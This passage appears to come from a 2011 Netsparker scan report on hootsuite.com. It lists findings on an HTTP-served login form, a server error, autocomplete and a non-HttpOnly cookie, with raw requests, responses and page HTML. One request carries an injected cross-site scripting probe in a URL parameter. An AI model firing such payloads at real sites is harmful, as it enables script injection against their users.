America/Tegucigalpa</option><option label="(GMT-6) Pacific/Easter" value="Pacific/Easter">(GMT-6) Pacific/Easter</option><option label="(GMT-6) Pacific/Galapagos" value="Pacific/Galapagos">(GMT-6) Pacific/Galapagos</option><option label="(GMT-5) America/Bogota" value="America/Bogota">(GMT-5) America/Bogota</option><option label="(GMT-5) America/Cayman" value="America/Cayman">(GMT-5) America/Cayman</option><option label="(GMT-5) America/Grand_Turk" value="America/Grand_Turk">(GMT-5) America/Grand_Turk</option><option label="(GMT-5) America/Guayaquil" value="America/Guayaquil">(GMT-5) America/Guayaquil</option><option label="(GMT-5) America/Havana" value="America/Havana">(GMT-5) America/Havana</option><option label="(GMT-5) America/Jamaica" value="America/Jamaica">(GMT-5) America/Jamaica</option><option label="(GMT-5) America/Lima" value="America/Lima">(GMT-5) America/Lima</option><option label="(GMT-5) America/Nassau" value="America/Nassau">(GMT-5) America/Nassau</option><option label="(GMT-5) America/Panama" value="America/Panama">(GMT-5) America/Panama</option><option label="(GMT-5) America/Port-au-Prince" value="America/Port-au-Prince">(GMT-5) America/Port-au-Prince</option><option label="(GMT-4.5) America/Caracas" value="America/Caracas">(GMT-4.5) America/Caracas</option><option label="(GMT-4) America/Anguilla" value="America/Anguilla">(GMT-4) America/Anguilla</option><option label="(GMT-4) America/Antigua" value=&qu..
Critical Form Served Over HTTP
Netsparker identified that a password field is served over HTTP.
Impact
If an attacker can carry out a MITM (man-in-the-middle) attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or by changing the action of the login form to steal the user's password. Even though the form's target page is HTTPS, this does not protect the system against MITM attacks, because the page that delivers the form is itself served over HTTP.
This issue is important as it negates the use of SSL as a privacy protection barrier.
Actions to Take
See the remedy for the solution.
Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
https://hootsuite.com/login
Request
GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: hootsuite.com Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Server: HootSuite Server v1.1 Date: Tue, 01 Mar 2011 13:23:03 GMT Content-Type: text/html Connection: keep-alive Set-Cookie: _SID=aeddf69c6dd7c69b4152973210ce56a723f86f74; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Gridnum: 29 Vary: Accept-Encoding Content-Encoding: Content-Length: 6435 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html class="static" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="ie=edge,chrome=1"> <meta name="keywords" content="HootSuite, Social Media Dashboard, Multiple Twitter Accounts, Corporate Twitter, Scheduled Tweets, Twitter Multiple User, Customized Twitter Layout, Twitter Stats" /> <meta name="description" content="HootSuite - Social Media Dashboard. With HootSuite, you can monitor keywords, manage multiple Twitter, Facebook, LinkedIn, Foursquare, Ping.fm and WordPress profiles, schedule messages, and measure your success." 
/> <link rel="apple-touch-icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/apple-touch-icon.png"/><meta name="application-name" content="HootSuite"/><meta name="application-url" content="http://hootsuite.com"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_128x128.png" sizes="128x128"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_48x48.png" sizes="48x48"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_32x32.png" sizes="32x32"/><link rel="shortcut icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/favicon.ico" /><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_16x16.png" sizes="16x16"/> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/base.gz.css" type="text/css" rel="stylesheet" /> <!--[if IE 7]> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/ie7.gz.css" type="text/css" rel="stylesheet" /> <![endif]--> <title>HootSuite - Social Media Dashboard for Teams using Twitter, Facebook, Linkedin</title></head> <body> <!--[if IE]> <a name="#" href="#"></a> <![endif]--> <script type="text/javascript"> var hs = hs || {}; hs.timers = new Object(); hs.prefs = new Object(); hs.c = new Object(); hs.c.rootUrl = "http://hootsuite.com"; hs.c.rootUrlSSL = "https://hootsuite.com"; hs.c.imageUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images"; hs.c.swfUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/swf"; hs.c.jsUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js"; hs.c.reportHeaderImageUrl = "https://d2l6uygi1pgnys.cloudfront.net/report_header_image/production"; hs.c.jsTemplateRootUrl = ('https:' == document.location.protocol.toLowerCase() ? 
hs.c.rootUrlSSL : hs.c.rootUrl) + '/js/internal/templates/'; hs.c.tweetPageSize = 30; hs.prefs.language = ''; hs.timezoneOffset=null; hs.memberId=null; hs.socialNetworks=[]; hs.socialNetworksKeyedByType=[]; hs.memberAutoInitial=""; hs.prefs.isNotifyNewTweet=0; hs.prefs.isNewRetweet = 0; hs.prefs.theme = ''; hs.prefs.allowSlimStreams = false; // TODO: replace with value from DB hs.languagePack = {}; hs.gp = 0; hs.fbAppKey="e0bebeb3a55265b11821edce13e316fe"; hs.fbChannelPath="http://hootsuite.com/xd_receiver.htm"; hs.fbFanpageId="177463958820"; </script> <script type="text/javascript" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js/hs.gz.js"></script> <div id="statusContainer" style="display: none;position:absolute;"> <div class="statusMessage rb-a-4"><span class="_statusMsgContent"></span></div></div> <div id="container" class="home"> <div id="content"> <div class="header"> <h1><a href="http://hootsuite.com"><img src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home_logo.png" /></a></h1> <a id="loginButton" class="btn-glass" href="#" tabindex="1">Login <span class="icon-19 expand"></span></a> <div id="loginBox" class="rb-a-5 offScreen"> <div id="openId"> <script type="text/javascript"> $().ready(function() { openid.init('openid_identifier'); }); </script> <form id="openid_form" action="https://hootsuite.com/openid-start" method="post" > <div id="openid_choice" style="display: block; "> <h3>Login or Signup with OpenID</h3> <p>Select one of these third-party accounts:</p> <div id="openid_btns"></div> </div> <div id="openid_input_area"></div> </form> </div> <div id="secureId" class="rb-a-4"> <form name="memberLoginForm" id="homePageMemberLoginForm" method="post" onKeyPress="checkForEnterKey(event, '_submitLogin');" action="https://hootsuite.com/login"> <h3>Login</h3> <span class="formError"></span> <span class="formError"></span> <span class="formError"></span> <label class="emailInput defaultTextInput title" for="loginEmail"> Email Address: 
</label> <input id="loginEmail" type="text" name="loginInfo[email]" maxlength="100" tabindex="2" /> <label class="passInput defaultTextInput title" for="loginPassword"> Password: </label> <input id="loginPassword" name="loginInfo[password]" type="password" tabindex="3"/> <p class="forgotPassword"><a href="retrieve-password" tabindex="4"><strong>Forgot Password?</strong></a></p> <p class="remember"> <label class="title"><input class="checkbox" type="checkbox" name="loginInfo[rememberMe]" checked="checked" tabindex="5" /> Remember Me</label> </p> <div class="btns-last"> <a class="btn-cmt _submitLogin" href="#" onclick="hs.throbberMgrObj.add('._submitLogin'); $('#homePageMemberLoginForm').submit(); return false;" tabindex="6">Secure Login</a> </div> <input type="hidden" name="redirect" value="" /> <input type="hidden" name="form_submit" value="Login" /> </form> </div> <script type="text/javascript"> /* $('#loginButton') */ $('#loginButton') .bind('click', function() { return false; }) .bind('mousedown', toggleLoginBox) .bind('focus', function(e) { setTimeout(function() { if ($('#loginBox').is('.visHide')) { // not already visible toggleLoginBox(e); } else { // already visible, do nothing } }, 1); }); function toggleLoginBox(e) { e.preventDefault(); $('#loginButton').toggleClass('btn-glass-dropdown'); $('#loginButton').find('.icon-19').swapClass('collapse','expand'); $('#loginBox').toggleClass('offScreen'); setTimeout(function() { $('#loginEmail').focus(); },1); return false; } </script> </div> </div> <div class="title"> <h1>Social Media Dashboard</h1> <a class="signup" href="https://hootsuite.com/signup">Sign Up Now</a> </div> <div class="slider"> <a class="slideLeft" href="#">Left</a> <div class="itemHolder"> <div class="items unique"> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_networks.png', 640, 480); return false;" tabindex="-1"> <img class="cta" 
src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="»" /> <h2>Spread Messages</h2> <p>Update multiple networks in one step, including Twitter, Facebook, LinkedIn, Wordpress.com, and Ping.fm</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_networks.png" alt="Networks" /> </a> </div> <div class="item"> <a href="http://hootsuite.com/mobile" title="View apps page" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="»" /> <h2>Social on the Go</h2> <p>Compose and converse on the go using mobile apps for iPhone, Android, Blackberry, iPad and more</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_mobile.png" alt="Retweet" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_analytics.jpg', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="»" /> <h2>Track Results</h2> <p>Review success in real-time with click-through statistics and easy report exporting</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_analytics.png" alt="Analytics" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_team.png', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="»" /> <h2>Team Collaboration</h2> <p>Manage multiple contributors and share data and access without sharing passwords</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_team.png" alt="Team" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" 
onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_themes.png', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="»" /> <h2>Custom Interface</h2> <p>Work efficiently with social streams, tabs, and columns -- plus a choice of design themes</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_themes.png" alt="Themes" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_assignment.jpg', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="»" /> <h2>Assign Tasks</h2> <p>Fine-tune your team by delegating messages and monitoring responses and progress</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_assignments.png" alt="Assignments" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_schedule.png', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="»" /> <h2>Scheduled Updates</h2> <p>Optimize delivery by choosing the best time and date to reach your audience </p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_schedule.png" alt="Schedule" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_internationalize.jpg', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="»" /> <h2>Internationalize</h2> <p>Feel 
comfortable with language localization in Japanese, French and Italian (more languages to come)</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_international.png" alt="International" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_mentions.png', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="»" /> <h2>Monitor Mentions</h2> <p>Gather intelligence by tracking mentions of your brand, industry, or search terms</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_mentions.png" alt="Mentions" /> </a> </div> </div> </div> <a class="slideRight" href="#">Right</a> </div> <div class="buckets"> <div class="users"> <h2>Hoo's Using HootSuite?</h2> </div> <div class="blog"> <h2>HootSuite Blog</h2> <ul class="messageList"> <li><a href="http://blog.hootsuite.com/hoottip-adding-lists-in-web/">#HootTip: Adding Lists In Your Web Dashboard</a></li><li><a href="http://blog.hootsuite.com/corporate-social-media-white-paper/">Business Social Media Report ~ HootSuite Partners with Useful Social Media for Corporate #WhitePaper</a></li><li><a href="http://blog.hootsuite.com/hootsuite-blackberry-linkedin-foursquare-facebook-twitter/">HootSuite #BlackBerry update: Now Free with Linkedin, Foursquare, Facebook and Twitter</a></li><li><a href="http://blog.hootsuite.com/hoottip-re-tweet-style/">#HootTip: Change your Re-Tweet Style on the Fly</a></li><li><a href="http://blog.hootsuite.com/hootsuite-facebook-pages/">HootSuite Updates Facebook Pages ~ Do more from the Dash</a></li><li><a href="http://blog.hootsuite.com/twitter-suspensions/">Inside Information on Recent Twitter Suspensions</a></li> </ul> </div> </div> <div id="aboutImagePopup" style="display:none;"></div> <script 
type="text/javascript">$(document).ready(function () { var itemTotal = $('div.slider .unique .item').size(); var itemWidth = $('div.slider .unique .item:first').outerWidth(); var itemsWidth = (itemTotal*itemWidth); var slideActive = 1; $('div.slider .unique').width(itemsWidth); $('div.slider').width(952);//ie6 fix tried container.width but still breaks var holderWidth = $('div.slider .itemHolder').outerWidth(); currentPos = 0; $('div.slider .unique').clone().prependTo($('div.slider .itemHolder')); $('div.slider .items:first-child').addClass('clone').removeClass('unique'); $('div.slider .clone').css('margin-left', (itemTotal*itemWidth)*-1); $('#homePageMemberLoginForm input#loginEmail').focus().select(); function slideTimer() { if (hs.timers.homeSlideTimer != undefined) { clearTimeout(hs.timers.homeSlideTimer); delete hs.timers.homeSlideTimer; } hs.timers.homeSlideTimer = setTimeout(function(){ if(!slideActive){return;} else { $('a.slideRight').click(); } }, 6000); } slideTimer(); $('a.slideLeft').click(function (e) { if($('div.slider .unique:animated').length <= 0) { targetPos = currentPos + itemWidth; currentPos = targetPos; $('div.slider .unique').animate( { marginLeft:targetPos }, 700 ); $('div.slider .clone').animate( { marginLeft:(targetPos-itemsWidth) }, 700, sliderContinuity ); } slideTimer(); e.preventDefault(); }); $('a.slideRight').click(function (e) { if($('div.slider .unique:animated').length <= 0) { targetPos = currentPos - itemWidth; currentPos = targetPos; ..
Internal Server Error
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.
Impact
The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.
Analyse this issue and review the application code in order to handle unexpected errors. Handling errors in this way should be a generic practice that does not disclose further information upon an error; all errors should be handled server side only.
/mobile/member
CONFIRMED
Parameters
Parameter: nsextt
Type: GET
Value: '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0006A7)%3C/script%3E
Request
GET /mobile/member?nsextt='%2522--%253E%253C/style%253E%253C/script%253E%253Cscript%253Enetsparker(0x0006A7)%253C/script%253E HTTP/1.1 Referer: http://hootsuite.com/mobile/member/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: hootsuite.com Cookie: _SID=b97776b889dd81702e58464c03cbd4019463e944; signup_plan_id=2 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error Server: HootSuite Server v1.1 Date: Tue, 01 Mar 2011 13:41:44 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Gridnum: 29 Vary: Accept-Encoding Content-Encoding: Content-Length: 20
Auto Complete Enabled
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".
Impact
Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.
Add the attribute autocomplete="off" to the form tag or to individual "input" fields.
Actions to Take
See the remedy for the solution.
Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.
Required Skills for Successful Exploitation
Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.
loginInfo[email]
Request and Response: identical to the GET / request and the 200 OK response recorded under Critical Form Served Over HTTP above; the affected field is the loginInfo[email] input in homePageMemberLoginForm.
Cookie Not Marked As HttpOnly
The cookie was not marked as HttpOnly. HttpOnly cookies cannot be read by client-side scripts, so marking a cookie as HttpOnly provides an additional layer of protection against Cross-site Scripting attacks.
Impact
During a Cross-site Scripting attack, an attacker can easily read the cookie and hijack the victim's session.
Actions to Take
See the remedy below for the solution.
Consider marking all of the cookies used by the application as HttpOnly. After this change, JavaScript code will no longer be able to read the cookies.
Mark the cookie as HttpOnly. This adds an extra layer of defence against XSS. However, it is not a silver bullet and will not protect the system against Cross-site Scripting attacks: an attacker can use a tool such as XSS Tunnel to bypass HttpOnly protection.
External References
_SID
Request
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hootsuite.com
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: HootSuite Server v1.1
Date: Tue, 01 Mar 2011 13:23:03 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: _SID=aeddf69c6dd7c69b4152973210ce56a723f86f74; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Gridnum: 29
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6435
(response body: the HootSuite home page HTML, omitted)